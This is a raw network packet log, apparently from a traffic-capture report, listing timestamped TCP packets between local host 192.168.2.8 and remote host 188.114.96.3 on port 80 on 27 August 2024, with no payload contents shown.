                                Aug 27, 2024 09:49:41.948942900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948955059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948966980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.948967934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948976994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.948982000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948993921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949004889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949012995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949027061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949028969 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949039936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949052095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949063063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949064970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949069977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949076891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949112892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949183941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949201107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949214935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949228048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949234009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949239969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949249029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949253082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949264050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949276924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949278116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949290991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949302912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949316025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949327946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949337006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949362993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949398994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949409962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949423075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949435949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949448109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949460983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949489117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949563980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949574947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949584961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949598074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949610949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949615002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949621916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949635029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949635029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949646950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949665070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949670076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949701071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949726105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949737072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949748993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949759960 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949803114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949819088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949831009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949841976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949852943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949871063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949877024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.949949980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949961901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949971914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949982882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949995041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.949996948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950006008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950018883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950030088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950052023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950064898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950082064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950093985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950104952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950117111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950128078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950141907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950151920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950184107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950196028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950206995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950221062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950222015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950233936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950244904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950246096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950283051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950340033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950351954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950364113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950375080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950387955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950391054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950400114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950406075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950417042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950437069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950460911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950473070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950525045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950536966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950547934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950565100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950594902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950689077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950701952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950714111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950723886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.950743914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.950758934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.951685905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951698065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951709986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951742887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.951776028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951787949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951798916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951811075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951817989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.951822996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.951833010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.951886892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952364922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952389002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952399969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952428102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952464104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952528000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952567101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952579021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952594995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952608109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952620983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952647924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952709913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952727079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952738047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952750921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952764034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952766895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952776909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952789068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952792883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952826977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.952982903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.952992916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.953002930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.953022003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.953022003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.953036070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.953047037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.953058958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.953069925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.953069925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.953107119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.992090940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992105007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992115974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992130041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992142916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992150068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992152929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.992161989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.992189884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.039237976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.079365969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079377890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079449892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079449892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.079466105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079479933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079509974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079520941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079520941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.079533100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.079544067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.079567909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080368042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080379963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080389977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080418110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080449104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080460072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080471039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080487967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080502033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080506086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080506086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080559015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080573082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080583096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080595970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080619097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080621004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080632925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080643892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.080653906 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.080678940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.081474066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081484079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081495047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081528902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081531048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.081567049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.081753969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081764936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081778049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081809998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.081835032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081845045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081851006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081857920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081891060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081937075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.081943989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081955910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081970930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.081974983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.081994057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.083265066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083276987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083288908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083314896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.083345890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.083348989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083364964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083376884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083388090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.083395958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.083431005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085520029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085563898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085573912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085607052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085650921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085689068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085736990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085753918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085766077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085777998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085791111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085791111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085808992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085813046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085822105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085833073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085844994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085856915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.085859060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085875034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.085901022 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086055994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086113930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086126089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086148024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086247921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086258888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086272001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086283922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086283922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086303949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086309910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086314917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086327076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086338043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086349010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086349964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086368084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086368084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086380005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086386919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086390972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086402893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086414099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086429119 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086450100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086519957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086530924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086549044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086554050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086560011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086571932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086582899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086584091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086595058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086606979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086611986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086618900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086637020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086638927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086648941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086664915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086667061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086679935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086709976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086724043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086736917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086743116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086771965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086801052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086812973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086824894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086850882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086946964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086957932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086967945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086980104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.086986065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.086997032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087002993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.087009907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087022066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087033987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087045908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087052107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.087057114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087069035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087074995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.087080002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087090969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.087093115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.087110996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.087133884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.123101950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123114109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123126030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123177052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.123194933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123210907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123222113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123236895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.123240948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.123275995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.164304018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.166362047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166384935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166395903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166466951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:42.166493893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166505098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166511059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:42.166529894 CEST8049715188.114.96.3192.168.2.8
